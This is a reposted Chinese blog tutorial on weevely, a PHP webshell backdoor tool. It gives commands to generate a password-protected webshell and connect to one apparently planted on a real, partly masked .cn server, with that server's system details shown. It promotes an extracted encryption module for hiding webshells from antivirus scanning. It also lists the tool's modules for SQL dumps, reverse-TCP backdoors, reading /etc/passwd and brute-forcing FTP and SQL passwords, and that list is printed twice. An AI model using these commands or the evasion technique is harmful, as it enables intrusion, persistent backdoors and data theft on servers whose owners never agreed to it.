weevely-------linux中的菜刀(转载)
weevely 是BT5中一個常用的webshell后門連接工具,它發揮的作用類似于中國菜刀(chopper)。
root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php
// 生成一個密碼為 ices 的php webshell.
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://app.*.cn/common/gen.php ices
// ./weevely.py http://*.com/webshell.php [password]???????? 連接
apache@HQEBWEBJ:/app/ecccs/web/common$ :system.info
// 按兩下 tab鍵,進入操控模式,例如輸入 system.info 獲得系統信息
whoami:?????? apache
hostname:??? HQEBWEBJ
basedir:???????????????? /app/ecccs/web/common
uname:??????????? Linux HQEBWEBJ 2.6.18-92.el5 #1 SMP Tue Apr 29 13:16:15 EDT 2008 x86_64 GNU/Linux
os:???????????????????? Linux
document_root:? /home/ecccs/web
safe_mode:?????????? 0
script:???????????????????? /common/gen.php
client_ip:?????????????? 120.3*.56.156
max_execution_time:? 30
php_self:????????????????????????? /common/gen.php
apache@HQEBWEBJ:/app/ecccs/web/common$ cat /etc/issue
Red Hat Enterprise Linux Server release 5.2 (Tikanga) Kernel
// 執行一般的命令
加密功能
冷冷的夜提取了weevely的php加密模塊? (其實這才是本文的亮點,用來免殺webshell)
$ python test.py? 原.php? 密.php
如下圖,加密后的php一句話webshell代碼中,只出現了str_replace這個熟知的函數,未出現其他關鍵字,這要查殺是非常難滴。
?
功能模塊
系統 system.info???????????? //收集系統信息 文件 file.read?????????????????? //讀文件 file.upload?????????????? //上傳本地文件 file.check???????????????? //檢查文件的權限和 file.enum???????????????? //在本地詞表的書面枚舉遠程文件 file.download????????? //下載遠程二進制/ ASCII文件到本地 SQL sql.query??????????????? //執行SQL查詢 sql.console??????????? //啟動SQL控制臺 sql.dump?????????????? //獲取SQL數據庫轉儲 sql.summary???????? //獲取SQL數據庫中的表和列 后門 backdoor.tcp?????????????????????? //TCP端口后門 backdoor.install????????????????? //安裝后門 backdoor.reverse_tcp??????? //反彈 枚舉 audit.user_files????????????????? //在用戶家中列舉常見的機密文件 audit.user_web_files??????? //列舉常見的Web文件 audit.etc_passwd????????????? //枚舉/etc/passwd 查找 find.webdir???????????? //查找可寫的web目錄 find.perm???????????????????? //查找權限可讀/寫/可執行文件和目錄 find.name??????????????????? //按名稱查找文件和目錄 find.suidsgid??????????????? //查找SUID / SGID文件和目錄 暴破 bruteforce.sql??????????????????? //暴力破解單一SQL用戶 bruteforce.sql_users??????? //暴力破解SQL密碼 bruteforce.ftp??????????????????? // 暴力破解單一FTP用戶 bruteforce.ftp_users???????? //暴力破解FTP密碼 系統 system.info?? //收集系統信息 文件 file.read??????? //讀文件 file.upload??????? //上傳本地文件 file.check??????? //檢查文件的權限和 file.enum??????? //在本地詞表的書面枚舉遠程文件 file.download??????? //下載遠程二進制/ ASCII文件到本地 SQL sql.query??????? //執行SQL查詢 sql.console??????? //啟動SQL控制臺 sql.dump??????? //獲取SQL數據庫轉儲 sql.summary??????? //獲取SQL數據庫中的表和列 后門 backdoor.tcp??????????????? //TCP端口后門 backdoor.install??????? //安裝后門 backdoor.reverse_tcp??????? //反彈 枚舉 audit.user_files??????? //在用戶家中列舉常見的機密文件 audit.user_web_files??????? //列舉常見的Web文件 audit.etc_passwd??????? //枚舉/etc/passwd 查找 find.webdir??????? //查找可寫的web目錄 find.perm??????? //查找權限可讀/寫/可執行文件和目錄 find.name??????? //按名稱查找文件和目錄 find.suidsgid??????? //查找SUID / SGID文件和目錄 暴破 bruteforce.sql??????????????? //暴力破解單一SQL用戶 bruteforce.sql_users??????? //暴力破解SQL密碼 bruteforce.ftp?????????????? // 暴力破解單一FTP用戶 bruteforce.ftp_users??????? //暴力破解FTP密碼
weevely–linux中的菜刀轉載于:https://www.cnblogs.com/demonspider/archive/2013/04/05/3001139.html
總結
以上是生活随笔為你收集整理的weevely-------linux中的菜刀(转载)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 使用Subversion版本标识符
- 下一篇: LINUX修改文件权限 学习